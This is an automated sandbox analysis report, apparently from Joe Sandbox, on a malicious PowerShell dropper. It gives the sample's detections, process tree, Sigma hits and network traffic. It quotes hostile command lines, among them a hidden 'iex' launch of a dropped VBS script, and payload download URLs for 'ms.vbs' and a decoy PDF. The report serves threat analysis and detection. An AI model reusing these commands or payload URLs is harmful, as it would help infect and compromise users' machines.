
Windows Analysis Report
1M1QoJF40r.ps1

Overview

General Information

Sample name: 1M1QoJF40r.ps1 (renamed because original name is a hash value)
Original sample name: a63c8dacfe1337cf5d0654c19c97c35068cd6a257220ef56d3a51402e4f83862.ps1
Analysis ID: 1578228
MD5: 038e1ec475d16db5d36b71e12dbc5874
SHA1: a5b86b7e287cc13b3a6620eeac6ae6664949f68d
SHA256: a63c8dacfe1337cf5d0654c19c97c35068cd6a257220ef56d3a51402e4f83862
Tags: 185-236-228-92, 87-120-112-91, ps1, www-al-rasikh-com, user-JAMESWT_MHT

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 3924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1M1QoJF40r.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4052 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\uipw9v.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • Acrobat.exe (PID: 6120 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 2248 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 2616 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1524,i,4216622319176972056,6080722429787729294,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 5576 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 3924 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
    Source | Rule | Description | Author | Strings
    amsi64_3924.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

      System Summary

      Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\uipw9v.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\uipw9v.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1M1QoJF40r.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3924, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\uipw9v.vbs'", ProcessId: 4052, ProcessName: powershell.exe
      Source: File created | Author: Florian Roth (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3924, TargetFilename: C:\Users\Public\zb6.vbs
      Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1M1QoJF40r.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1M1QoJF40r.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1M1QoJF40r.ps1", ProcessId: 3924, ProcessName: powershell.exe
      Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3924, TargetFilename: C:\Users\Public\zb6.vbs
      Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1M1QoJF40r.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1M1QoJF40r.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1M1QoJF40r.ps1", ProcessId: 3924, ProcessName: powershell.exe
      Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5576, ProcessName: svchost.exe
      No Suricata rule has matched


      AV Detection

      Source: 1M1QoJF40r.ps1 | Avira: detected
      Source: 1M1QoJF40r.ps1 | Virustotal: Detection: 41%
      Source: 1M1QoJF40r.ps1 | ReversingLabs: Detection: 34%
      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 96.6% probability
      Source: unknown | HTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.6:49710 version: TLS 1.2
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2322019431.0000028B0F862000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2205292098.0000015040265000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2422673623.0000028B29C02000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2322019431.0000028B0F862000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2422673623.0000028B29C52000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbe source: powershell.exe, 00000000.00000002.2422673623.0000028B29C02000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.2326344878.0000028B11370000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: CallSite.Target.pdbon.resources source: powershell.exe, 00000000.00000002.2424666019.0000028B29CEA000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000000.00000002.2422673623.0000028B29C52000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32X source: powershell.exe, 00000003.00000002.2204234398.00000150401C7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.2422673623.0000028B29C02000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000000.00000002.2422673623.0000028B29C52000.00000004.00000020.00020000.00000000.sdmp
      Source: global traffic | HTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1 | Host: www.astenterprises.com.pk | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /ms/ms.vbs HTTP/1.1 | Host: www.bluemaxxlaser.com | Connection: Keep-Alive
      Source: Joe Sandbox View | IP Address: 203.175.174.69
      Source: Joe Sandbox View | IP Address: 107.161.23.150
      Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic | DNS traffic detected: DNS query: www.astenterprises.com.pk
      Source: global traffic | DNS traffic detected: DNS query: www.bluemaxxlaser.com
      Source: global traffic | DNS traffic detected: DNS query: x1.i.lencr.org
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 19 Dec 2024 11:48:03 GMT | Server: Apache | Content-Length: 315 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B13485000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://astenterprises.com.pk
      Source: svchost.exe, 00000007.00000002.3369454437.000002C55C612000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
      Source: 77EC63BDA74BD0D0E0426DC8F80085060.6.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
      Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: edb.log.7.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: powershell.exe, 00000003.00000002.2178720470.0000015028C43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
      Source: powershell.exe, 00000000.00000002.2415392969.0000028B21A0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2415392969.0000028B21B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2197506866.0000015037D5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B119A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2178720470.0000015027CF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B13485000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.astenterprises.com.pk
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B134BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2328899793.0000028B1351B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.bluemaxxlaser.com
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B134BE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.bluemaxxlaser.com/ms/ms.vbs
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B11BD2000.00000004.00000800.00020000.00000000.sdmp, 1M1QoJF40r.ps1 | String found in binary or memory: http://www.blupw4maxxlaspw4r.com/ms/ms.vbs
      Source: powershell.exe, 00000000.00000002.2422487333.0000028B29AE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
      Source: 2D85F72862B55C4EADD9E66E06947F3D0.6.dr | String found in binary or memory: http://x1.i.lencr.org/
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B119A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2178720470.0000015027CF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2178720470.000001502931A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2178720470.00000150291FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000003.00000002.2178720470.000001502931A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
      Source: powershell.exe, 00000003.00000002.2197506866.0000015037D5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000003.00000002.2197506866.0000015037D5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000003.00000002.2197506866.0000015037D5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
      Source: edb.log.7.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
      Source: svchost.exe, 00000007.00000003.2274805623.000002C55C430000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
      Source: powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B125D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2178720470.000001502931A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2178720470.0000015028C43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
      Source: powershell.exe, 00000000.00000002.2415392969.0000028B21A0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2415392969.0000028B21B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2197506866.0000015037D5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B13153000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.astenterprises.com.pk
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B13153000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.astenterprises.com.pk/ms/List
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B13153000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B13153000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.astpw4ntpw4rprispw4s.com.pk/ms/List%20of%20rpw4quirpw4d%20itpw4ms%20and%20spw4rvicpw4s.p
      Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
      Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD34893CFA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD34893EFA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348962FB
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD34896151
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348957FA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD348C5FDC
      Source: classification engine | Classification label: mal84.evad.winPS1@20/61@5/3
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Desktop\List of Required items and services.pdf
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3212:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ecthr1o2.hsk.ps1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\uipw9v.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1M1QoJF40r.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\uipw9v.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1524,i,4216622319176972056,6080722429787729294,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\uipw9v.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1524,i,4216622319176972056,6080722429787729294,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdatauser.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
